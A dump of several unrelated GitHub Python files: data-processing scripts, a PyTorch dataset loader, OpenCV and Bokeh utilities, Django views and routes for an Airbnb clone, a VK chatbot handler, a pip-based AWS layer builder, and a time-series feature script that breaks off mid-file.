+{"seq_id":"40798892900","text":"if __name__ == '__main__':\n import pandas as pd\n import geopandas as gpd\n import numpy as np\n from utils.BBI_utils import mergeData, computeBBI, simpleLowpassFilter, getSuperelevation, getAdvisorySpeed, \\\n alignData\n from utils.LRS_utils import NCATgetReferencePoints, getDistToMid, getReferenceCurve, NCATgetRadius\n from utils.NCAT_processing import NCAT_processing\n from utils.SR_processing import SR_processing\n\n loc = pd.read_csv(r'2021_03_11_07_36_21_506_loc.csv')\n acc = pd.read_csv(r'2021_03_11_07_36_21_506_acc.csv')\n print(acc)\n print(acc.shape)\n crash = pd.read_csv(r'Crashdata.csv')\n # Chooses certain columns\n crash = crash.filter(items=['Road_Name', 'KABCO_Seve', 'Manner_of_', 'Location_a', 'Latitude', 'Longitude'])\n # Filters out all collision based crashes\n crash = crash[crash['Manner_of_'].eq('Not a Collision with Motor Vehicle')]\n # Filters out intersection crashes\n crash = crash[crash['Location_a'].str.contains('Non-Intersection') | crash['Location_a'].eq('Off Roadway')]\n print(crash)\n print(crash.shape)\n SR_obj = SR_processing(inFiles=[r'2021_03_11_07_36_21_506_loc.csv',r'2021_03_11_07_36_21_506_acc.csv'])\n SR_obj.gdf.to_file(\"smartphone.shp\")\n print(acc.columns)\n print(loc.columns)\n print(loc)\n # Not sure why this merge doesn't work...\n # all_csv_data = pd.merge(left=loc, right=acc, how='left', left_on='timestamp_utc_local', right_on='timestamp_nanosecond')\n all_csv_data = pd.concat([loc, acc], axis=1)\n print(all_csv_data)\n road_17 = gpd.read_file('0017_D1_2/0017_D1_2.shp')\n # print(SR_obj.gdf)","repo_name":"steveand117/tsai-ML-curve-safety","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38391934704","text":"from torch.utils.data.dataset import Dataset\nimport pandas as pd\nimport torch\nfrom sklearn.preprocessing import MinMaxScaler\nimport pickle\nfrom typing import List\n\n# Keys of the different types of variables.\ncat_vars = [\n \"Store\",\n \"DayOfWeek\",\n \"StateHoliday\",\n \"CompetitionMonthsOpen\",\n \"Promo2Weeks\",\n \"StoreType\",\n \"Assortment\",\n \"State\",\n \"Week\",\n \"Events\",\n \"Is_quarter_end_DE\",\n \"Is_quarter_start\",\n \"WindDirDegrees\",\n \"Is_quarter_start_DE\",\n \"Is_month_end\",\n \"Open\",\n \"Is_year_end\",\n \"Is_year_start_DE\",\n \"Is_month_start_DE\",\n \"Promo2\",\n \"Is_year_end_DE\",\n \"Dayofweek\",\n \"Is_month_start\",\n]\n\ncont_vars = [\n \"Sales\",\n \"Promo2SinceWeek\",\n \"Max_TemperatureC\",\n \"Mean_TemperatureC\",\n \"Min_TemperatureC\",\n \"Max_Humidity\",\n \"Mean_Humidity\",\n \"Min_Humidity\",\n \"Max_Wind_SpeedKm_h\",\n \"Mean_Wind_SpeedKm_h\",\n \"CloudCover\",\n \"trend\",\n \"trend_DE\",\n \"Promo\",\n \"SchoolHoliday\",\n \"Min_VisibilitykM\",\n \"Min_DewpointC\",\n \"Mean_VisibilityKm\",\n \"Precipitationmm\",\n \"MeanDew_PointC\",\n \"Mean_Sea_Level_PressurehPa\",\n \"Max_Sea_Level_PressurehPa\",\n \"Promo2Days\",\n \"Customers\",\n \"CompetitionDaysOpen\",\n \"Dew_PointC\",\n \"Dayofyear\",\n \"Min_Sea_Level_PressurehPa\",\n \"Max_Gust_SpeedKm_h\",\n \"Elapsed\",\n \"Max_VisibilityKm\",\n \"CompetitionOpenSinceMonth\",\n \"CompetitionOpenSinceYear\",\n \"Promo2SinceYear\",\n]\n\nweather_vars = [\n \"Max_TemperatureC\",\n \"Mean_TemperatureC\",\n \"Min_TemperatureC\",\n \"Dew_PointC\",\n \"MeanDew_PointC\",\n \"Min_DewpointC\",\n \"Max_Humidity\",\n \"Mean_Humidity\",\n \"Min_Humidity\",\n \"Max_Sea_Level_PressurehPa\",\n \"Mean_Sea_Level_PressurehPa\",\n \"Min_Sea_Level_PressurehPa\",\n \"Max_VisibilityKm\",\n \"Mean_VisibilityKm\",\n \"Min_VisibilitykM\",\n \"Max_Wind_SpeedKm_h\",\n \"Mean_Wind_SpeedKm_h\",\n \"Max_Gust_SpeedKm_h\",\n \"Precipitationmm\",\n \"CloudCover\",\n \"WindDirDegrees\",\n]\n\noutput_file_name = \"./data/joined_cleaned.pkl\"\n\n\ndef data_clean(joined: pd.DataFrame) -> pd.DataFrame:\n \"\"\"[function currently does basic na forward\n filling and conversion of variables to useful types.\n I also drop a bunch of columns that either are entirely null or\n duplciate columns, the data source seems to be a weirdly processed]\n\n Arguments:\n joined {df} -- [original df from kaggle download\n https://www.kaggle.com/init27/fastai-v3-rossman-data-clean]\n\n Returns:\n [df] -- [cleaned df]\n \"\"\"\n joined.loc[:, weather_vars] = joined.loc[:, weather_vars].fillna(\n method=\"ffill\"\n )\n\n weather_vars.append(\"Events\")\n\n # some of the initial Max_Gust_Speed Data was missing\n # so I filled with the Max_wind Speed.\n joined.loc[\n joined[\"Max_Gust_SpeedKm_h\"].isna(), \"Max_Gust_SpeedKm_h\"\n ] = joined.loc[joined[\"Max_Gust_SpeedKm_h\"].isna(), \"Max_Wind_SpeedKm_h\"]\n\n # change text data into categories, as codes.\n joined[\"Events\"] = joined[\"Events\"].astype(\"category\").cat.codes + 1\n joined[\"Store\"] = joined[\"Store\"] - 1\n joined[\"DayOfWeek\"] = joined[\"DayOfWeek\"] - 1\n joined[\"Week\"] = joined[\"Week\"] - 1\n joined[\"Assortment\"] = joined[\"Assortment\"].astype(\"category\").cat.codes\n joined[\"State\"] = joined[\"State\"].astype(\"category\").cat.codes\n joined[\"WindDirDegrees\"] = (\n joined[\"WindDirDegrees\"].astype(\"category\").cat.codes\n )\n joined[\"StoreType\"] = joined[\"StoreType\"].astype(\"category\").cat.codes\n\n # Drop variables 
that didn't look useful.\n joined.drop(\n [\n \"Promo2Since\",\n \"Year\",\n \"Month\",\n \"Day\",\n \"PromoInterval\",\n \"StateName\",\n \"file_DE\",\n \"State_DE\",\n \"Dayofweek_DE\",\n \"Day_DE\",\n \"Date\",\n \"Is_quarter_end\",\n \"Is_month_end_DE\",\n \"Is_year_start\",\n \"week\",\n \"file\",\n \"Month_DE\",\n \"week_DE\",\n \"Dayofyear_DE\",\n \"CompetitionOpenSince\",\n \"Date_DE\",\n \"Elapsed_DE\",\n \"CompetitionDistance\",\n ],\n axis=1,\n inplace=True,\n )\n if \"Id\" in joined.keys():\n joined.drop(\"Id\", axis=1, inplace=True)\n\n # check the keys. Make sure that we don't have a miss match\n # between keys in list and dataframe.\n a = set(joined.keys())\n total_keys = cat_vars.copy()\n total_keys.extend(cont_vars)\n b = set(total_keys)\n c = a.difference(b)\n assert not c\n\n # convert booleans to ints.\n joined[joined.select_dtypes(include=\"bool\").keys()] = joined.select_dtypes(\n include=\"bool\"\n ).astype(\"int\")\n\n # change to floats.\n joined[cont_vars] = joined[cont_vars].astype(\"float\")\n joined.dropna(0, inplace=True)\n return joined\n\n\nclass RossmanDataset(Dataset):\n \"\"\"[puts data into a useful format to be used by the dataloader]\n \"\"\"\n\n @classmethod\n def from_pickle(cls, pickle_file: str):\n \"\"\"[creates the object from pickled dict, use to load pre-processed data]\n Arguments:\n pickle_file {[str]} -- [file name of pickled Rossmann Dataset.]\n \"\"\"\n with open(pickle_file, \"rb\") as input:\n file = pickle.load(input)\n return file\n\n def to_pickle(self, output_file: str):\n \"\"\"[puts the object into a pickle file for later recovery]\n\n Arguments:\n output_file {[str]} -- [output filename]\n \"\"\"\n with open(output_file, \"wb\") as output:\n pickle.dump(self, output, pickle.HIGHEST_PROTOCOL)\n\n def __init__(\n self,\n df: pd.DataFrame,\n cont_vars: List[str],\n cat_vars: List[str],\n indices: List[int],\n scaler=MinMaxScaler(),\n ):\n\n # reading data, transforms etc..\n # column lists\n self.x_cols = df.columns.difference([\"Sales\", \"Customers\"])\n self.Y_cols = [\"Sales\", \"Customers\"]\n\n # scaler = MinMaxScaler()\n self.scaler = scaler\n\n # if statement on whether scaler has been set or not.\n if self.scaler == self.__init__.__defaults__[0]:\n\n # training case\n self.data = df.loc[indices, :].copy()\n\n # fit!!! and transform the continuous variables.\n self.data.loc[\n :, cont_vars + self.Y_cols\n ] = self.scaler.fit_transform(\n self.data.loc[:, cont_vars + self.Y_cols]\n )\n\n else:\n\n # validation case\n self.data = df.loc[indices, :].copy()\n\n # transform the continuous variables.\n self.data.loc[:, cont_vars + self.Y_cols] = self.scaler.transform(\n self.data.loc[:, cont_vars]\n )\n\n self.data.reset_index(inplace=True)\n self.data.drop([\"index\"], inplace=True, axis=1)\n\n # Make sure that the columsn have correct types\n self.x_data_cat = torch.tensor(\n self.data[cat_vars].values, dtype=torch.int\n )\n self.x_data_cont = torch.tensor(\n self.data[cont_vars].values, dtype=torch.float32\n )\n self.Y_data = torch.tensor(\n self.data[self.Y_cols].values, dtype=torch.float32\n )\n self.length = self.data.shape[0]\n\n def __getitem__(self, index):\n # returns the input and output\n return (\n self.x_data_cat[index],\n self.x_data_cont[index],\n self.Y_data[index],\n )\n\n def __len__(self):\n return self.length # of how many examples(images?) 
you have\n\n\nif __name__ == \"__main__\":\n\n # Example usage\n # just used the joined dataframes\n joined = pd.read_pickle(\"./data/joined\")\n\n # joined_test doesn't contain customers or sales.\n # they are the predicted variables.\n joined_test = pd.read_pickle(\"./data/joined_test\")\n\n # push through data clean function\n # i.e. drop nonesense columns and fill nans\n joined = data_clean(joined)\n\n # train valid splitting\n split_train = int(joined.shape[0] * 0.8)\n split_valid = joined.shape[0] - split_train\n train, valid = torch.utils.data.random_split(\n joined, [split_train, split_valid]\n )\n\n # create and save the training set\n train_data = RossmanDataset(joined, cont_vars, cat_vars, train.indices)\n train_data.to_pickle(\"./data/train_data.pkl\")\n\n # create and save the validation set using the scaler\n # set in the training set.\n valid_data = RossmanDataset(\n joined, cont_vars, cat_vars, valid.indices, scaler=train_data.scaler\n )\n valid_data.to_pickle(\"./data/valid_data.pkl\")\n","repo_name":"MatthewLennie/Rossmann","sub_path":"import_rossman_data.py","file_name":"import_rossman_data.py","file_ext":"py","file_size_in_byte":8646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
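Once the `__main__` block above has written the pickles, a `RossmanDataset` plugs straight into a PyTorch `DataLoader`; each batch is the (categorical, continuous, target) triple produced by `__getitem__`. A usage sketch, assuming `./data/train_data.pkl` has already been created:

```python
from torch.utils.data import DataLoader

train_data = RossmanDataset.from_pickle("./data/train_data.pkl")
loader = DataLoader(train_data, batch_size=128, shuffle=True)

x_cat, x_cont, y = next(iter(loader))
# x_cat: [128, n_categorical], x_cont: [128, n_continuous], y: [128, 2]
print(x_cat.shape, x_cont.shape, y.shape)
```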
+{"seq_id":"70192735580","text":"import cv2\nimport numpy as np\n# # 读取图像\n# def get_edge_contour(img):\n# threshold1 = 100\n# threshold2 = 200\n# len_threshold = 2\n# edges = cv2.Canny(img, threshold1, threshold2)\n\n# cv2.imwrite('edges.png', edges)\n\n# # 查找轮廓\n# contours, _ = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n \n# # 显示所有轮廓\n# mask = np.zeros(img.shape)\n# for c in contours:\n# # 过滤小面积\n# if (cv2.contourArea(c) < len_threshold ** 2):\n# continue\n \n# cv2.drawContours(img, [c], 0, (0, 255, 0), 1)\n \n# cv2.imwrite('contours.png', img)\n\n\ndef color_edge(img):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n height, width, _ = img.shape\n scale = (height + width)/2\n \n # cv2.imshow(\"hsv\", hsv)\n minBlue = np.array([100, 15, 46])\n maxBlue = np.array([124, 255, 255])\n \n # 确定蓝色区域\n mask = cv2.inRange(hsv, minBlue, maxBlue)\n # cv2.imwrite(\"mask.png\", mask)\n \n # 通过按位与获取蓝色区域\n blue_img = cv2.bitwise_and(img, img, mask=mask)\n cv2.imwrite(\"blue.png\", blue_img)\n\n # 将mask进行形态学处理消除内部外部的噪点\n kernel_size1 = int(scale / 60)\n kernel_size2 = int(scale / 16)\n if kernel_size1 == 0 or kernel_size2 == 0:\n return None\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(kernel_size1,kernel_size1))\n kernel2 = cv2.getStructuringElement(cv2.MORPH_RECT,(kernel_size2,kernel_size2))\n #定义矩形结构元素\n # erode1 = cv2.erode(mask,kernel,iterations=1)\n # cv2.imwrite(\"erode1.png\", erode1)\n open0 = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel,iterations=2)\n cv2.imwrite(\"open0.png\", open0)\n \n closed1 = cv2.morphologyEx(open0, cv2.MORPH_CLOSE, kernel2,iterations=2)\n cv2.imwrite(\"closed1.png\", closed1)\n\n open1 = cv2.morphologyEx(closed1, cv2.MORPH_OPEN, kernel2,iterations=2)\n cv2.imwrite(\"open1.png\", open1)\n\n # 提取边界\n ret, binary = cv2.threshold(open1,127,255,cv2.THRESH_BINARY)\n\n binary = np.float32(binary)\n dst = cv2.cornerHarris(binary,4,5,0.04)\n dst = cv2.dilate(dst,None)\n # dst: height * width\n \n candidate_pos = np.array(np.where(dst > 0.2 * dst.max())).transpose()\n if candidate_pos.shape[0] == 0:\n return None\n # pos[0]->height pos[1]->width\n left_top = candidate_pos[0]\n right_top = candidate_pos[0]\n left_bottom = candidate_pos[0]\n right_bottom = candidate_pos[0]\n # 遍历每个点,找到距离四角最近的点\n # 计算四个角点的坐标\n pos_plus = candidate_pos[:, 0] + candidate_pos[:, 1]\n pos_minus = candidate_pos[:, 0] - candidate_pos[:, 1]\n left_top_arg = np.argmin(pos_plus)\n right_bottom_arg = np.argmax(pos_plus)\n left_bottom_arg = np.argmax(pos_minus)\n right_top_arg = np.argmin(pos_minus)\n\n left_top = candidate_pos[left_top_arg]\n right_bottom = candidate_pos[right_bottom_arg]\n left_bottom = candidate_pos[left_bottom_arg]\n right_top = candidate_pos[right_top_arg]\n \n return [left_top, right_top, left_bottom, right_bottom] \n\n\n\n\nif __name__ == \"__main__\":\n # img = cv2.imread('0.png', cv2.THRESH_BINARY)\n # cv2.imwrite('1.png', img)\n # get_edge_contour(img)\n img = cv2.imread('0.png')\n color_edge(img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n","repo_name":"yangjh155/Unet","sub_path":"edge_contour.py","file_name":"edge_contour.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12221790830","text":"import pandas as pd\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.layouts import column\n\noutput_file('index.html')\np = []\nindex = 0\ngranularities = ['day', 'month', 'year']\nTOOLS = 'pan,box_zoom,wheel_zoom,box_select,hover,resize,reset,save'\n\nfor item in granularities:\n data = pd.read_csv('../data/' + item + '.csv', parse_dates=['Date'])\n\n p.append(figure(title='This chart is generated using Bokeh library',\n width=900, height=500, x_axis_type=\"datetime\", tools=TOOLS))\n\n p[index].line(data['Date'], data['Price'], line_width=2)\n\n p[index].circle(data['Date'], data['Price'], fill_color=\"white\", size=6)\n\n p[index].xaxis[0].axis_label = 'Date'\n p[index].yaxis[0].axis_label = 'Price in USD'\n index += 1\n\nshow(column(p[0], p[1], p[2]))\n","repo_name":"datopian/line-charts","sub_path":"bokeh/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"11630598699","text":"from django.urls import path\nfrom . import views\n\napp_name = 'core'\n\nurlpatterns = [\n \n path('', views.index_views, name='home'),\n \n path('events/information', views.event_views, name='info'),\n \n path('booking/bus/search/', views.add_to_bookings, name='addhire'),\n \n path('bus/register', views.bus_hire_view, name='bookbus'),\n \n path('aboutus', views.aboutUs_page, name='about'),\n \n path('faQ', views.faQ_page, name='faQ'),\n \n path('booking/bus/search', views.SearchView.as_view(), name='searchpath'),\n \n path('booking/', views.BookingBusDetail.as_view(), name='bookingdetail'),\n \n path(\"booking/bus/direction//\", views.DirectionDetail.as_view(), name=\"direction_detail\"),\n\n # path('hiring', views.hirebus, name='hiringbus'),\n\n # path('booking', booking_views, name='book'),\n \n # path(\n \n # \"informaa1276765433niaganalanajanaanaianau34aranaeanawana324apanaoana456543akanqanyana56banatanhanaban45456774\",\n\n # name='booked'\n \n # )\n \n]\n","repo_name":"metalcode03/BusBuggy","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"29574803218","text":"from wiki import Wiki\nclass Commander:\n hello = [\"hello\",\"ghbdtn\",\"привет\",\"хай\"]\n whatsup = [\"че как\",\"че как?\", \"как дела\",\"как дела?\"]\n wiki = [\"wiki\", \"википедия\",\"вики\"]\n last_msg = \"\"\n def ans(self,text:str):\n text = text.lower()\n if self.last_msg == \"вики\":\n w = Wiki()\n self.last_msg = \"\"\n return w.get_wiki(text)\n\n for i in self.hello:\n if text == i:\n self.last_msg = \"\"\n return \"Привет, я БОТ_ИМЯ!\\nЯ умею присылать статью из Википедии(напиши: вики или wiki)\"\n\n for i in self.whatsup:\n if text == i:\n self.last_msg = \"\"\n return \"У меня всгда все круто, я же рообот\\nА у тебя как дела?\"\n\n for i in self.wiki:\n if text == i:\n self.last_msg = \"вики\"\n return \"Что ты хочешь узнать?\"\n\n return \"Я тебя не понял\"\n","repo_name":"temsiPatrin/vk_bot_super","sub_path":"commander.py","file_name":"commander.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"41674512056","text":"from django.forms.forms import Form\nfrom django.urls.base import reverse_lazy\nfrom django.views.generic import ListView, DetailView, UpdateView, FormView, View\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.http import Http404\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.views.generic.edit import CreateView\nfrom django_countries import countries\nfrom rooms import forms, models as room_model\nfrom reservations import models as res_model\nfrom rooms import forms as room_form\nfrom users import mixins\nfrom users.mixins import LoggedInOnlyView\n\n\n# from django.http import HttpResponse # django translate the request\n# Create your views here.\n\n\nclass HomeView(ListView):\n\n \"\"\"Home View Definition\"\"\"\n\n model = room_model.Room\n paginate_by = 12\n context_object_name = \"page\"\n ordering = \"created\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n now = timezone.now() # get_context_data search in doc\n context[\"now\"] = now\n return context\n\n\ndef room_detail(request, pk):\n try:\n room = room_model.Room.objects.get(pk=pk)\n reservations = res_model.Reservation.objects.filter(room=room)\n for reservation in reservations:\n if reservation.is_finished():\n reservation.delete()\n return render(request, \"rooms/detail.html\", context={\"room\": room})\n except room_model.Room.DoesNotExist:\n # return redirect(reverse(\"core:home\")) # reverse returns url\n raise Http404()\n\n\n# class ModelNameDetail(DetailView):\n# model = room_model.Room\n# pk_url_kwarg=\"pk\"\n# you don't need to raise the http 404~\n# to more customize this, look it up on the CCBV\n\n\nclass EditRoomView(LoggedInOnlyView, UpdateView):\n model = room_model.Room\n template_name = \"rooms/room_edit.html\"\n fields = (\n \"name\",\n \"description\",\n \"country\",\n \"city\",\n \"price\",\n \"address\",\n \"guests\",\n \"beds\",\n \"bedrooms\",\n \"bath\",\n \"check_in\",\n \"check_out\",\n \"instant_book\",\n \"room_type\",\n \"amenity\",\n \"facility\",\n \"house_rule\",\n )\n\n def get_object(self, queryset=None):\n room = super().get_object(queryset=queryset)\n if room.host.pk != self.request.user.pk:\n raise Http404()\n return room\n\n\nclass UploadRoomView(FormView, mixins.LoggedInOnlyView):\n form_class = room_form.CreateRoomForm\n template_name = \"rooms/room_create.html\"\n\n def form_valid(self, form):\n room = form.save()\n room.host = self.request.user\n room.save()\n form.save_m2m()\n return redirect(reverse(\"rooms:detail\", kwargs={\"pk\": room.pk}))\n\n\nclass RoomPhotosView(DetailView):\n model = room_model.Room\n template_name = \"rooms/room_photos.html\"\n\n def get_object(self, queryset=None): # override\n room = super().get_object(queryset=queryset)\n if room.host.pk != self.request.user.pk:\n raise Http404()\n return room\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n rooms = room_model.Room.objects.all()\n context[\"rooms\"] = rooms\n return context\n\n\n# class SearchView(View):\n# def get(self, request):\n\n# country = request.GET.get(\"country\")\n\n# if country:\n\n# form = forms.SearchForm(request.GET)\n\n# if form.is_valid():\n\n# city = form.cleaned_data.get(\"city\")\n# country = form.cleaned_data.get(\"country\")\n# room_type = 
form.cleaned_data.get(\"room_type\")\n# price = form.cleaned_data.get(\"price\")\n# guests = form.cleaned_data.get(\"guests\")\n# bedrooms = form.cleaned_data.get(\"bedrooms\")\n# beds = form.cleaned_data.get(\"beds\")\n# baths = form.cleaned_data.get(\"baths\")\n# instant_book = form.cleaned_data.get(\"instant_book\")\n# superhost = form.cleaned_data.get(\"superhost\")\n# amenities = form.cleaned_data.get(\"amenities\")\n# facilities = form.cleaned_data.get(\"facilities\")\n\n# filter_args = {}\n\n# if city != \"Anywhere\":\n# filter_args[\"city__startswith\"] = city\n\n# filter_args[\"country\"] = country\n\n# if room_type is not None:\n# filter_args[\"room_type\"] = room_type\n\n# if price is not None:\n# filter_args[\"price__lte\"] = price\n\n# if guests is not None:\n# filter_args[\"guests__gte\"] = guests\n\n# if bedrooms is not None:\n# filter_args[\"bedrooms__gte\"] = bedrooms\n\n# if beds is not None:\n# filter_args[\"beds__gte\"] = beds\n\n# if baths is not None:\n# filter_args[\"baths__gte\"] = baths\n\n# if instant_book is True:\n# filter_args[\"instant_book\"] = True\n\n# if superhost is True:\n# filter_args[\"host__superhost\"] = True\n\n# for amenity in amenities:\n# filter_args[\"amenities\"] = amenity\n\n# for facility in facilities:\n# filter_args[\"facilities\"] = facility\n\n# rooms = room_model.Room.objects.filter(**filter_args)\n\n# else:\n\n# form = forms.SearchForm()\n\n# return render(request, \"rooms/search.html\", {\"form\": form, \"rooms\": rooms})\n\n\ndef Search(request):\n city = request.GET.get(\"city\", \"anywhere\")\n room_type = int(request.GET.get(\"room_type\", 0))\n room_types = room_model.RoomType.objects.all()\n country = request.GET.get(\"country\", \"KR\")\n price = int(request.GET.get(\"price\", 0))\n guests = int(request.GET.get(\"guests\", 0))\n beds = int(request.GET.get(\"beds\", 0))\n bedrooms = int(request.GET.get(\"bedrooms\", 0))\n bath = int(request.GET.get(\"bath\", 0))\n\n amenities = room_model.Amenity.objects.all()\n facilities = room_model.Facility.objects.all()\n form = {\n \"city\": city,\n \"s_room_type\": room_type, # from database\n \"s_country\": country,\n \"price\": price,\n \"guests\": guests,\n \"beds\": beds,\n \"bedrooms\": bedrooms,\n \"bath\": bath,\n }\n choices = {\n \"countries\": countries,\n \"room_types\": room_types,\n \"amenities\": amenities,\n \"facilities\": facilities,\n }\n filter_args = {}\n if city != \"anywhere\":\n filter_args[\"city__startswith\"] = city\n filter_args[\"country\"] = country\n if room_type != 0:\n filter_args[\"room_type__pk\"] = room_type\n if price != 0:\n filter_args[\"price__lte\"] = price # refer to lookup session on documentation\n if guests != 0:\n filter_args[\"guests__gte\"] = guests\n if beds != 0:\n filter_args[\"beds__gte\"] = beds\n if bedrooms != 0:\n filter_args[\"bedrooms__gte\"] = bedrooms\n if bath != 0:\n filter_args[\"bath__gte\"] = bath\n rooms = room_model.Room.objects.filter(**filter_args)\n return render(\n request,\n template_name=\"rooms/search.html\",\n context={**form, **choices, \"rooms\": rooms},\n )\n\n\n@login_required\ndef delete_photo(request, room_pk, photo_pk):\n user = request.user\n try:\n room = room_model.Room.objects.get(pk=room_pk)\n if user.pk != room.host.pk:\n messages.error(request, \"can't delete that photo\")\n else:\n photo = room_model.Photo.objects.get(pk=photo_pk)\n photo.delete()\n messages.success(request, \"Photo is successfully deleted\")\n return redirect(reverse(\"rooms:photos\", kwargs={\"pk\": room_pk}))\n\n except 
room_model.Room.DoesNotExist:\n return redirect(reverse(\"core:home\"))\n\n\nclass EditPhotoView(mixins.LoggedInOnlyView, UpdateView):\n model = room_model.Photo\n template_name = \"rooms/photo_edit.html\"\n fields = (\"caption\",)\n pk_url_kwarg = \"photo_pk\"\n success_message = \"Photo_updated\"\n\n def get_success_url(self):\n room_pk = self.kwargs.get(\"room_pk\")\n return reverse(\"rooms:photos\", kwargs={\"pk\": room_pk})\n\n\nclass AddPhotoView(mixins.LoggedInOnlyView, FormView, SuccessMessageMixin):\n model = room_model.Photo\n template_name = \"rooms/photo_create.html\"\n form_class = forms.CreatePhotoForm\n\n def form_valid(self, form):\n pk = self.kwargs.get(\"pk\")\n form.save(pk)\n messages.success(self.request, \"Photo Uploaded\")\n return redirect(reverse(\"rooms:photos\", kwargs={\"pk\": pk}))\n","repo_name":"glauke1996/airbnb-clone","sub_path":"airbnb_project/rooms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74401199270","text":"import os\nimport subprocess\nimport sys\nfrom .base_handler import BaseHandler\nimport logging\n\n\nlogging.basicConfig(level=logging.ERROR)\nPATH = \"python/lib/python3.8/site-packages\"\n\n\nclass PipHandler(BaseHandler):\n def __init__(self, cli) -> None:\n super().__init__(cli=cli)\n self._build_dirs()\n\n def _build_dirs(self) -> None:\n os.makedirs(PATH, exist_ok=True)\n\n def install_dependencies(self) -> None:\n for dependencie in self.configs[\"libraries\"]:\n try:\n subprocess.check_call(\n [sys.executable, \"-m\", \"pip\", \"install\", dependencie, \"-t\", PATH]\n )\n except subprocess.CalledProcessError:\n continue\n","repo_name":"brianamaral/aws_layer_publisher","sub_path":"layer_builder/pip_handler.py","file_name":"pip_handler.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"42787209056","text":"#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n# See the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n#\n# Author: Matthew Dixon, Diego Klabjan, Jin Hoon Bang\n# Description: Given multiple time series data in (M x 2) CSV format, this script\n# generates label (-1, 0, 1) and features (lagging price, moving averages, correlation)\n# In the input time series data, the first column is time stamp and the second oolumn is price.\n# In the current path, there are 43 symbols (43 different time series data).\n# Two files per symbol are generated: *_large.bin and *_small.bin. The two files differ\n# in number of datapoints that they contain.\n# For lagging and moving averages, normalized price values are used.\n# For calculating correlation between each symbol, return price value is used.\n\n\nimport pandas as pd\nimport glob\nimport numpy as np\nimport os\nimport sys\nimport math\nimport random\n\npd.set_option('precision', 15)\n\nparams = dict(\n path = os.path.join(os.path.expanduser('~'), 'data', 'csv', '*'),\n min_lagging = 1,\n max_lagging = 100,\n #interval_lagging = 1, #not implemented\n min_moving_average = 2,\n max_moving_average = 100,\n #interval_moving_average = 1, #not implemented\n list_epsilon = [0.01, 0.001, 0.0001, 0.00001, 0.000001, 0.0000001,0.00000001],\n theta = 0.001,\n max_correlation_window = 100,\n stock_count = 43,\n small_output_size = 50000,\n)\n\n#get paths to all files in 'file_path'\ninput_files = []\nfor file in glob.glob(params['path']):\n input_files.append(file)\ninput_files.sort()\n\n#find the symbol with the lowest number of datapoints\n#number of datapoints in the output is limited by the symbol with the lowest number of datapoints.\nlist_n = []\nfor file in input_files:\n df = pd.read_csv(file, header=None, dtype='float64')\n list_n.append(len(df))\nmin_n = min(list_n)\nprint(\"min_n:\", min_n)\n\n#dataframes for accumulating normalized price and return price across all symbols\ndf_normalized = pd.DataFrame(dtype='float64')\ndf_return = pd.DataFrame(dtype='float64')\n\nfor file in input_files:\n df = pd.read_csv(file, names=['Timestamp', 'Price'], header=None, dtype='float64')\n df = df.ix[:min_n]\n series_price = df.Price\n series_return = pd.Series(index = df.index, name=\"Return\"+file, dtype='float64')\n\n #generate return price\n for i in range(0, min_n - 1):\n series_return[i] = (series_price[i+1]-series_price[i])/series_price[i]\n series_return = series_return.dropna()\n df_return = pd.concat([df_return, series_return], axis=1)\n\n #generate normalized price\n meanPrice = np.mean(series_price)\n stdPrice = np.std(series_price)\n\n series_normalized = pd.Series(index=series_price.index, name=\"PriceNormalized\"+file, dtype='float64')\n\n for i in range(0, min_n):\n series_normalized[i] = (series_price[i]-meanPrice)/stdPrice\n df_normalized = pd.concat([df_normalized, series_normalized], axis=1)\n\n 
